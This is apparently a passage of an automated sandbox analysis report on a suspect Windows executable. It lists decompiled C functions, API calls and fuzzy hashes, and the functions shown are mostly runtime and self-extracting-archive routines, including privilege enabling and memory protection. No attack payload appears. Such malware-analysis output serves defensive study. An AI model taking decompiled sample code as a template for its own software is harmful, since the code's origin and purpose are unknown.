          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
          • String ID:
          • API String ID: 336800556-0
          • Opcode ID: ea9d9a26d07311e80cd3f0d7678c7892c671bbde91695da901a588ef13d0a554
          • Instruction ID: 412bfc9b95f5e03caa5c8f34094f57114b7934eaba4b41a1949244631f00f4f1
          • Opcode Fuzzy Hash: ea9d9a26d07311e80cd3f0d7678c7892c671bbde91695da901a588ef13d0a554
          • Instruction Fuzzy Hash: D5018872622615BF23311ABA6C4DCFF79EDDED6B60315022AFD04D2141DA618D9285F1
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 82%
          			E0021859A(void* __ecx, void* __edx) {
          				void* __esi;
          				intOrPtr _t2;
          				void* _t4;
          				void* _t10;
          				void* _t11;
          				void* _t13;
          				void* _t16;
          				long _t17;
          
          				_t11 = __ecx;
          				_t17 = GetLastError();
          				_t10 = 0;
          				_t2 =  *0x22d6ac; // 0x6
          				_t20 = _t2 - 0xffffffff;
          				if(_t2 == 0xffffffff) {
          					L2:
          					_t16 = E00217B1B(_t11, 1, 0x364);
          					_pop(_t13);
          					if(_t16 != 0) {
          						_t4 = E00219BA9(_t13, _t17, __eflags,  *0x22d6ac, _t16);
          						__eflags = _t4;
          						if(_t4 != 0) {
          							E00218388(_t13, _t16, 0x250418);
          							E00217A50(_t10);
          							__eflags = _t16;
          							if(_t16 != 0) {
          								goto L9;
          							} else {
          								goto L8;
          							}
          						} else {
          							_push(_t16);
          							goto L4;
          						}
          					} else {
          						_push(_t10);
          						L4:
          						E00217A50();
          						L8:
          						SetLastError(_t17);
          					}
          				} else {
          					_t16 = E00219B53(_t11, _t17, _t20, _t2);
          					if(_t16 != 0) {
          						L9:
          						SetLastError(_t17);
          						_t10 = _t16;
          					} else {
          						goto L2;
          					}
          				}
          				return _t10;
          			}












          APIs
          • GetLastError.KERNEL32(?,?,?,00217ED1,00217B6D,?,00218544,00000001,00000364,?,00212E0F,?,?,002300E0), ref: 0021859F
          • _free.LIBCMT ref: 002185D4
          • _free.LIBCMT ref: 002185FB
          • SetLastError.KERNEL32(00000000,?,002300E0), ref: 00218608
          • SetLastError.KERNEL32(00000000,?,002300E0), ref: 00218611
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: ErrorLast$_free
          • String ID:
          • API String ID: 3170660625-0
          • Opcode ID: ef3f9f9bfef2184f78a92beab7e498a0b63e32d11f7b385f4fec937156c800aa
          • Instruction ID: 2a19f8aa075ee5f2f301f732b333c593d26f210c117ee0b62f14ce89b3005368
          • Opcode Fuzzy Hash: ef3f9f9bfef2184f78a92beab7e498a0b63e32d11f7b385f4fec937156c800aa
          • Instruction Fuzzy Hash: 150126362786017AD3226A707CC99FB25EECBF13657220124F80592142EE628EF24424
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 82%
          			E002003C7(void* __ecx) {
          				intOrPtr _v16;
          				void* __ebp;
          				int _t16;
          				void** _t21;
          				long* _t25;
          				void* _t28;
          				void* _t30;
          				intOrPtr _t31;
          
          				_t22 = __ecx;
          				_push(0xffffffff);
          				_push(E00221161);
          				_push( *[fs:0x0]);
          				 *[fs:0x0] = _t31;
          				_t28 = __ecx;
          				E00200697(__ecx);
          				_t25 = 0;
          				 *((char*)(__ecx + 0x314)) = 1;
          				ReleaseSemaphore( *(__ecx + 0x318), 0x40, 0);
          				if( *((intOrPtr*)(_t28 + 0x104)) > 0) {
          					_t21 = _t28 + 4;
          					do {
          						E002004BA(_t22, _t30,  *_t21);
          						CloseHandle( *_t21);
          						_t25 = _t25 + 1;
          						_t21 =  &(_t21[1]);
          					} while (_t25 <  *((intOrPtr*)(_t28 + 0x104)));
          				}
          				DeleteCriticalSection(_t28 + 0x320);
          				CloseHandle( *(_t28 + 0x318));
          				_t16 = CloseHandle( *(_t28 + 0x31c));
          				 *[fs:0x0] = _v16;
          				return _t16;
          			}












          APIs
            • Part of subcall function 00200697: ResetEvent.KERNEL32(?), ref: 002006A9
            • Part of subcall function 00200697: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 002006BD
          • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 002003FB
          • CloseHandle.KERNEL32(?,?), ref: 00200415
          • DeleteCriticalSection.KERNEL32(?), ref: 0020042E
          • CloseHandle.KERNEL32(?), ref: 0020043A
          • CloseHandle.KERNEL32(?), ref: 00200446
            • Part of subcall function 002004BA: WaitForSingleObject.KERNEL32(?,000000FF,002005D9,?,?,0020064E,?,?,?,?,?,00200638), ref: 002004C0
            • Part of subcall function 002004BA: GetLastError.KERNEL32(?,?,0020064E,?,?,?,?,?,00200638), ref: 002004CC
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
          • String ID:
          • API String ID: 1868215902-0
          • Opcode ID: 9300ef61d3ea8a84d2eeb4c12064689860fd83452193b3fdc201d0da6777b5ec
          • Instruction ID: 6ce65edc2cd79f521261d157d52851b92fd949c81bc184859852b2324572fcd8
          • Opcode Fuzzy Hash: 9300ef61d3ea8a84d2eeb4c12064689860fd83452193b3fdc201d0da6777b5ec
          • Instruction Fuzzy Hash: 2F01F532410704FBD7319FA4EC88FC6BBEDFB58710F400519F25A821A0C7762A59CB94
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			E0021B461(intOrPtr* _a4) {
          				intOrPtr _t6;
          				intOrPtr* _t21;
          				void* _t23;
          				void* _t24;
          				void* _t25;
          				void* _t26;
          				void* _t27;
          
          				_t21 = _a4;
          				if(_t21 != 0) {
          					_t23 =  *_t21 -  *0x22dd50; // 0x22dd44
          					if(_t23 != 0) {
          						E00217A50(_t7);
          					}
          					_t24 =  *((intOrPtr*)(_t21 + 4)) -  *0x22dd54; // 0x25088c
          					if(_t24 != 0) {
          						E00217A50(_t8);
          					}
          					_t25 =  *((intOrPtr*)(_t21 + 8)) -  *0x22dd58; // 0x25088c
          					if(_t25 != 0) {
          						E00217A50(_t9);
          					}
          					_t26 =  *((intOrPtr*)(_t21 + 0x30)) -  *0x22dd80; // 0x22dd48
          					if(_t26 != 0) {
          						E00217A50(_t10);
          					}
          					_t6 =  *((intOrPtr*)(_t21 + 0x34));
          					_t27 = _t6 -  *0x22dd84; // 0x250890
          					if(_t27 != 0) {
          						return E00217A50(_t6);
          					}
          				}
          				return _t6;
          			}











          APIs
          • _free.LIBCMT ref: 0021B479
            • Part of subcall function 00217A50: RtlFreeHeap.NTDLL(00000000,00000000,?,0021B4F8,?,00000000,?,00000000,?,0021B51F,?,00000007,?,?,0021B91C,?), ref: 00217A66
            • Part of subcall function 00217A50: GetLastError.KERNEL32(?,?,0021B4F8,?,00000000,?,00000000,?,0021B51F,?,00000007,?,?,0021B91C,?,?), ref: 00217A78
          • _free.LIBCMT ref: 0021B48B
          • _free.LIBCMT ref: 0021B49D
          • _free.LIBCMT ref: 0021B4AF
          • _free.LIBCMT ref: 0021B4C1
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: _free$ErrorFreeHeapLast
          • String ID:
          • API String ID: 776569668-0
          • Opcode ID: 0fafafece491739adf53b8663a2919f83bc3bb77dbb05d9c9d62e085ebc2a02b
          • Instruction ID: 3cbf54d6aa530561f6d4e3f697b071e10d73ce6e5485b724d1efa840b924edd4
          • Opcode Fuzzy Hash: 0fafafece491739adf53b8663a2919f83bc3bb77dbb05d9c9d62e085ebc2a02b
          • Instruction Fuzzy Hash: E0F06233564600BBC631EFB4F889C9A73F9AE60710B649805F04DE7511C730FCD18A64
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 91%
          			E002175DB(signed int __ecx) {
          				intOrPtr _t7;
          
          				asm("lock xadd [eax], ecx");
          				if((__ecx | 0xffffffff) == 0) {
          					_t7 =  *0x22dd40; // 0xdb22b0
          					if(_t7 != 0x22db20) {
          						E00217A50(_t7);
          						 *0x22dd40 = 0x22db20;
          					}
          				}
          				E00217A50( *0x250410);
          				 *0x250410 = 0;
          				E00217A50( *0x250414);
          				 *0x250414 = 0;
          				E00217A50( *0x250860);
          				 *0x250860 = 0;
          				E00217A50( *0x250864);
          				 *0x250864 = 0;
          				return 1;
          			}





          APIs
          • _free.LIBCMT ref: 002175F9
            • Part of subcall function 00217A50: RtlFreeHeap.NTDLL(00000000,00000000,?,0021B4F8,?,00000000,?,00000000,?,0021B51F,?,00000007,?,?,0021B91C,?), ref: 00217A66
            • Part of subcall function 00217A50: GetLastError.KERNEL32(?,?,0021B4F8,?,00000000,?,00000000,?,0021B51F,?,00000007,?,?,0021B91C,?,?), ref: 00217A78
          • _free.LIBCMT ref: 0021760B
          • _free.LIBCMT ref: 0021761E
          • _free.LIBCMT ref: 0021762F
          • _free.LIBCMT ref: 00217640
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: _free$ErrorFreeHeapLast
          • String ID:
          • API String ID: 776569668-0
          • Opcode ID: ca72eed4e23eba47e29d6caaab6f84819d2193f6ec13c4dc69092e91c19df078
          • Instruction ID: a4b6e17eb63020ad62f965bab7fe7894485ff5f3f8c8f8633c7052397666a7e9
          • Opcode Fuzzy Hash: ca72eed4e23eba47e29d6caaab6f84819d2193f6ec13c4dc69092e91c19df078
          • Instruction Fuzzy Hash: 5CF05E718287289B8612AF78BC8D99E3BF4BBA47157162116F51166372C7301AA18FCD
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 88%
          			E00216C73(void* __ecx, void* __edx, intOrPtr _a4) {
          				signed int _v8;
          				void* _v12;
          				char _v16;
          				void* __ebx;
          				void* __edi;
          				void* __esi;
          				intOrPtr* _t36;
          				struct HINSTANCE__* _t37;
          				struct HINSTANCE__* _t43;
          				intOrPtr* _t44;
          				intOrPtr* _t45;
          				CHAR* _t49;
          				struct HINSTANCE__* _t50;
          				void* _t52;
          				struct HINSTANCE__* _t55;
          				intOrPtr* _t59;
          				struct HINSTANCE__* _t64;
          				intOrPtr _t65;
          
          				_t52 = __ecx;
          				if(_a4 == 2 || _a4 == 1) {
          					E0021A7B3(_t52);
          					GetModuleFileNameA(0, 0x2502b8, 0x104);
          					_t49 =  *0x250868; // 0xda32f0
          					 *0x250870 = 0x2502b8;
          					if(_t49 == 0 ||  *_t49 == 0) {
          						_t49 = 0x2502b8;
          					}
          					_v8 = 0;
          					_v16 = 0;
          					E00216D97(_t52, _t49, 0, 0,  &_v8,  &_v16);
          					_t64 = E00216F0C(_v8, _v16, 1);
          					if(_t64 != 0) {
          						E00216D97(_t52, _t49, _t64, _t64 + _v8 * 4,  &_v8,  &_v16);
          						if(_a4 != 1) {
          							_v12 = 0;
          							_push( &_v12);
          							_t50 = E0021A2CE(_t49, 0, _t64, _t64);
          							if(_t50 == 0) {
          								_t59 = _v12;
          								_t55 = 0;
          								_t36 = _t59;
          								if( *_t59 == 0) {
          									L15:
          									_t37 = 0;
          									 *0x25085c = _t55;
          									_v12 = 0;
          									_t50 = 0;
          									 *0x250860 = _t59;
          									L16:
          									E00217A50(_t37);
          									_v12 = 0;
          									goto L17;
          								} else {
          									goto L14;
          								}
          								do {
          									L14:
          									_t36 = _t36 + 4;
          									_t55 =  &(_t55->i);
          								} while ( *_t36 != 0);
          								goto L15;
          							}
          							_t37 = _v12;
          							goto L16;
          						}
          						 *0x25085c = _v8 - 1;
          						_t43 = _t64;
          						_t64 = 0;
          						 *0x250860 = _t43;
          						goto L10;
          					} else {
          						_t44 = E00217ECC();
          						_push(0xc);
          						_pop(0);
          						 *_t44 = 0;
          						L10:
          						_t50 = 0;
          						L17:
          						E00217A50(_t64);
          						return _t50;
          					}
          				} else {
          					_t45 = E00217ECC();
          					_t65 = 0x16;
          					 *_t45 = _t65;
          					E00217DAB();
          					return _t65;
          				}
          			}






















          APIs
          • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\dUzAkYsvl8.exe,00000104), ref: 00216CB3
          • _free.LIBCMT ref: 00216D7E
          • _free.LIBCMT ref: 00216D88
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: _free$FileModuleName
          • String ID: C:\Users\user\Desktop\dUzAkYsvl8.exe
          • API String ID: 2506810119-2066119735
          • Opcode ID: 07148a6f36f590bbf1af69ff0cc4506378c2a2114ee8fde801f82934323bc718
          • Instruction ID: c955b63efae9d955b9f9fc72b3338bde58d7b48179c6835a276169e93298d1dd
          • Opcode Fuzzy Hash: 07148a6f36f590bbf1af69ff0cc4506378c2a2114ee8fde801f82934323bc718
          • Instruction Fuzzy Hash: 22314FB1A14319ABCB21DF99AC89DEEBBF8EFA5310F104066F80497211D6715EA1CF91
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 63%
          			E001F73B9(void* __ebx, void* __edx, void* __esi) {
          				void* _t26;
          				long _t32;
          				void* _t39;
          				void* _t42;
          				intOrPtr _t43;
          				void* _t52;
          				void* _t57;
          				void* _t58;
          				void* _t61;
          
          				_t57 = __esi;
          				_t52 = __edx;
          				_t42 = __ebx;
          				E0020D870(E00221321, _t61);
          				E0020D940();
          				 *((intOrPtr*)(_t61 - 0x20)) = 0;
          				 *((intOrPtr*)(_t61 - 0x1c)) = 0;
          				 *((intOrPtr*)(_t61 - 0x18)) = 0;
          				 *((intOrPtr*)(_t61 - 0x14)) = 0;
          				 *((char*)(_t61 - 0x10)) = 0;
          				_t54 =  *((intOrPtr*)(_t61 + 8));
          				_push(0);
          				_push(0);
          				 *((intOrPtr*)(_t61 - 4)) = 0;
          				_push(_t61 - 0x20);
          				if(E001F399D( *((intOrPtr*)(_t61 + 8)), _t52) != 0) {
          					if( *0x230042 == 0) {
          						if(E001F7A15(L"SeSecurityPrivilege") != 0) {
          							 *0x230041 = 1;
          						}
          						E001F7A15(L"SeRestorePrivilege");
          						 *0x230042 = 1;
          					}
          					_push(_t57);
          					_t58 = 7;
          					if( *0x230041 != 0) {
          						_t58 = 0xf;
          					}
          					_push(_t42);
          					_t43 =  *((intOrPtr*)(_t61 - 0x20));
          					_push(_t43);
          					_push(_t58);
          					_push( *((intOrPtr*)(_t61 + 0xc)));
          					if( *0x22de80() == 0) {
          						if(E001FB32C( *((intOrPtr*)(_t61 + 0xc)), _t61 - 0x106c, 0x800) == 0) {
          							L10:
          							E001F6BF5(_t70, 0x52, _t54 + 0x1e,  *((intOrPtr*)(_t61 + 0xc)));
          							_t32 = GetLastError();
          							E0020E214(_t32);
          							if(_t32 == 5 && E001FFC98() == 0) {
          								E001F1567(_t61 - 0x6c, 0x18);
          								E00200A9F(_t61 - 0x6c);
          							}
          							E001F6E03(0x2300e0, 1);
          						} else {
          							_t39 =  *0x22de80(_t61 - 0x106c, _t58, _t43);
          							_t70 = _t39;
          							if(_t39 == 0) {
          								goto L10;
          							}
          						}
          					}
          				}
          				_t26 = E001F159C(_t61 - 0x20);
          				 *[fs:0x0] =  *((intOrPtr*)(_t61 - 0xc));
          				return _t26;
          			}













          APIs
          • __EH_prolog.LIBCMT ref: 001F73BE
            • Part of subcall function 001F399D: __EH_prolog.LIBCMT ref: 001F39A2
          • GetLastError.KERNEL32(00000052,?,?,?,?,00000800,?,?,?,00000000,00000000), ref: 001F7485
            • Part of subcall function 001F7A15: GetCurrentProcess.KERNEL32(00000020,?), ref: 001F7A24
            • Part of subcall function 001F7A15: GetLastError.KERNEL32 ref: 001F7A6A
            • Part of subcall function 001F7A15: CloseHandle.KERNEL32(?), ref: 001F7A79
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
          • String ID: SeRestorePrivilege$SeSecurityPrivilege
          • API String ID: 3813983858-639343689
          • Opcode ID: 65a3139f781035ad3c5f254b4f6b1bc99e824772e26f06058d5c55234ef33bbc
          • Instruction ID: 090f896cad2daa6a070f95808593ca19f7b55cae2248aa3afa8d9929567c1ca7
          • Opcode Fuzzy Hash: 65a3139f781035ad3c5f254b4f6b1bc99e824772e26f06058d5c55234ef33bbc
          • Instruction Fuzzy Hash: 6B31A171A0420CAADF20EBA8EC45BFE7B69AF65304F044055FA09E7192C7B54A55CBB1
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 62%
          			E00209B8D(void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR** _a16) {
          				void* _t12;
          				void* _t16;
          				void* _t22;
          				WCHAR** _t24;
          				void* _t25;
          				intOrPtr _t27;
          				void* _t28;
          				struct HWND__* _t30;
          				signed short _t31;
          
          				_t24 = _a16;
          				_t31 = _a12;
          				_t30 = _a4;
          				_t27 = _a8;
          				if(E001F12D7(__edx, _t30, _t27, _t31, _t24, L"ASKNEXTVOL", 0, 0) != 0) {
          					L14:
          					__eflags = 1;
          					return 1;
          				}
          				_t28 = _t27 - 0x110;
          				if(_t28 == 0) {
          					_push( *_t24);
          					 *0x24fe38 = _t24;
          					L13:
          					SetDlgItemTextW(_t30, 0x66, ??);
          					goto L14;
          				}
          				if(_t28 != 1) {
          					L6:
          					return 0;
          				}
          				_t12 = (_t31 & 0x0000ffff) - 1;
          				if(_t12 == 0) {
          					GetDlgItemTextW(_t30, 0x66,  *( *0x24fe38), ( *0x24fe38)[1]);
          					_push(1);
          					L10:
          					EndDialog(_t30, ??);
          					goto L14;
          				}
          				_t16 = _t12 - 1;
          				if(_t16 == 0) {
          					_push(0);
          					goto L10;
          				}
          				if(_t16 == 0x65) {
          					_push(0);
          					_push(E001FB943(__eflags,  *( *0x24fe38)));
          					_push( *( *0x24fe38));
          					_push(E001FDA42(_t25, 0x8e));
          					_t22 = E001F10B0(_t30);
          					__eflags = _t22;
          					if(_t22 == 0) {
          						goto L14;
          					}
          					_push( *( *0x24fe38));
          					goto L13;
          				}
          				goto L6;
          			}













          APIs
            • Part of subcall function 001F12D7: GetDlgItem.USER32(00000000,00003021), ref: 001F131B
            • Part of subcall function 001F12D7: SetWindowTextW.USER32(00000000,002222E4), ref: 001F1331
          • EndDialog.USER32(?,00000001), ref: 00209C15
          • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00209C2A
          • SetDlgItemTextW.USER32(?,00000066,?), ref: 00209C3F
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: ItemText$DialogWindow
          • String ID: ASKNEXTVOL
          • API String ID: 445417207-3402441367
          • Opcode ID: a82268066de80d01e65be7bdd468076056a56ad2325207eab03e260310364c6d
          • Instruction ID: c114fd07b058ca5ded177ecb053f42d5b70ef4b2afe9f8bf076c5aa8c6ef462e
          • Opcode Fuzzy Hash: a82268066de80d01e65be7bdd468076056a56ad2325207eab03e260310364c6d
          • Instruction Fuzzy Hash: 10118733754205BFE7119FA4ED4DF6637A9EB5B701F140011F2029A0F3C7A599A29729
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 20%
          			E001FE862(void* __ebx, void* __edi, intOrPtr _a4, signed int _a8, char _a12, intOrPtr _a16) {
          				void* __esi;
          				void* __ebp;
          				intOrPtr* _t11;
          				intOrPtr* _t12;
          				signed char _t13;
          				void* _t17;
          				signed char _t18;
          				void* _t20;
          				signed int _t22;
          				signed int _t30;
          				void* _t31;
          				void* _t32;
          				intOrPtr _t33;
          				signed int _t36;
          
          				_t32 = __edi;
          				_t17 = __ebx;
          				_t11 =  *0x237358; // 0x0
          				if(_t11 == 0) {
          					E001FE7E3(0x237350);
          					_t11 =  *0x237358; // 0x0
          				}
          				_t36 = _a8;
          				_t22 = _t36 & 0xfffffff0;
          				_t30 = 0 | _a16 != 0x00000000;
          				if(_a12 == 0) {
          					_t12 =  *0x23735c; // 0x0
          					if(_t12 == 0) {
          						goto L10;
          					} else {
          						_t13 =  *_t12(_a4, _t22, _t30);
          						if(_t13 == 0) {
          							_push(L"CryptUnprotectMemory failed");
          							goto L6;
          						}
          					}
          				} else {
          					if(_t11 == 0) {
          						L10:
          						_push(_t17);
          						_t13 = GetCurrentProcessId();
          						_t31 = 0;
          						_t18 = _t13;
          						if(_t36 != 0) {
          							_push(_t32);
          							_t33 = _a4;
          							_t20 = _t18 + 0x4b;
          							do {
          								_t13 = _t31 + _t20;
          								 *(_t31 + _t33) =  *(_t31 + _t33) ^ _t13;
          								_t31 = _t31 + 1;
          							} while (_t31 < _t36);
          						}
          					} else {
          						_t13 =  *_t11(_a4, _t22, _t30);
          						if(_t13 == 0) {
          							_push(L"CryptProtectMemory failed");
          							L6:
          							_push(0x2300e0);
          							_t13 = E001F6CC9(E0020E214(E001F6CCE(_t22)), 0x2300e0, 0x2300e0, 2);
          						}
          					}
          				}
          				return _t13;
          			}


















          APIs
            • Part of subcall function 001FE7E3: GetProcAddress.KERNEL32(00000000,CryptProtectMemory), ref: 001FE802
            • Part of subcall function 001FE7E3: GetProcAddress.KERNEL32(00237350,CryptUnprotectMemory), ref: 001FE812
          • GetCurrentProcessId.KERNEL32(?,?,?,001FE85C), ref: 001FE8E3
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: AddressProc$CurrentProcess
          • String ID: CryptProtectMemory failed$CryptUnprotectMemory failed$Ps#
          • API String ID: 2190909847-2377627361
          • Opcode ID: 4dacfe9b4ecbbb0444a398f2676e90f69185a5e3b12c25a94d0708c71e9d33d8
          • Instruction ID: 2bceb43bc0eb8e2f7ffb8832df794945ee552dd113441da8c5e2f50d58d4d5eb
          • Opcode Fuzzy Hash: 4dacfe9b4ecbbb0444a398f2676e90f69185a5e3b12c25a94d0708c71e9d33d8
          • Instruction Fuzzy Hash: 9B117A3070421D7BEF24AB38DC45BBA37C9EF84BA4F044029FB049B1B2DB60DD50A2A0
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 58%
          			E001FCE52(void* __ebx, void* __ecx, void* __edi) {
          				void* __esi;
          				intOrPtr _t26;
          				signed int* _t30;
          				void* _t31;
          				void* _t34;
          				void* _t42;
          				void* _t44;
          				void* _t46;
          				void* _t48;
          				void* _t49;
          				void* _t50;
          
          				_t44 = __edi;
          				_t43 = __ecx;
          				_t42 = __ebx;
          				_t48 = _t49 - 0x64;
          				_t50 = _t49 - 0xac;
          				_t46 = __ecx;
          				if( *((intOrPtr*)(__ecx + 0x2c)) > 0) {
          					 *((intOrPtr*)(_t48 + 0x5c)) =  *((intOrPtr*)(_t48 + 0x6c));
          					 *((char*)(_t48 + 8)) = 0;
          					 *((intOrPtr*)(_t48 + 0x60)) = _t48 + 8;
          					if( *((intOrPtr*)(_t48 + 0x74)) != 0) {
          						E002011FA( *((intOrPtr*)(_t48 + 0x74)), _t48 - 0x48, 0x50);
          					}
          					_t26 =  *((intOrPtr*)(_t48 + 0x70));
          					if(_t26 == 0) {
          						E001FFA56(_t48 + 8, "s", 0x50);
          					} else {
          						_t34 = _t26 - 1;
          						if(_t34 == 0) {
          							_push(_t48 - 0x48);
          							_push("$%s");
          							goto L9;
          						} else {
          							if(_t34 == 1) {
          								_push(_t48 - 0x48);
          								_push("@%s");
          								L9:
          								_push(0x50);
          								_push(_t48 + 8);
          								E001FD9DC();
          								_t50 = _t50 + 0x10;
          							}
          						}
          					}
          					_t16 = _t46 + 0x18; // 0x63
          					_t18 = _t46 + 0x14; // 0xdc2718
          					_t30 = E00214E71(_t42, _t43, _t44, _t46, _t48 + 0x58,  *_t18,  *_t16, 4, E001FCC88);
          					if(_t30 == 0) {
          						goto L1;
          					} else {
          						_t20 = 0x22d158 +  *_t30 * 0xc; // 0x2233e0
          						E002154E0( *((intOrPtr*)(_t48 + 0x78)),  *_t20,  *((intOrPtr*)(_t48 + 0x7c)));
          						_t31 = 1;
          					}
          				} else {
          					L1:
          					_t31 = 0;
          				}
          				return _t31;
          			}















          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306153135.00000000001F1000.00000020.00020000.sdmp, Offset: 001F0000, based on PE: true
          • Associated: 00000000.00000002.306147089.00000000001F0000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306237995.0000000000222000.00000002.00020000.sdmp
          • Associated: 00000000.00000002.306258195.000000000022D000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306270813.0000000000234000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306276296.0000000000250000.00000004.00020000.sdmp
          • Associated: 00000000.00000002.306289036.0000000000251000.00000002.00020000.sdmp
          Similarity
          • API ID: __fprintf_l_strncpy
          • String ID: $%s$@%s
          • API String ID: 1857242416-834177443
          • Opcode ID: 7fdcedd9ffcbdaa8e4fb9ebedec96ad91f500e1190b8a9ea78db6ea6bc818ea7
          • Instruction ID: 86ca81df2978a0e92bc550731271903a7461158a85d538a937868f4b88e9de08
          • Opcode Fuzzy Hash: 7fdcedd9ffcbdaa8e4fb9ebedec96ad91f500e1190b8a9ea78db6ea6bc818ea7
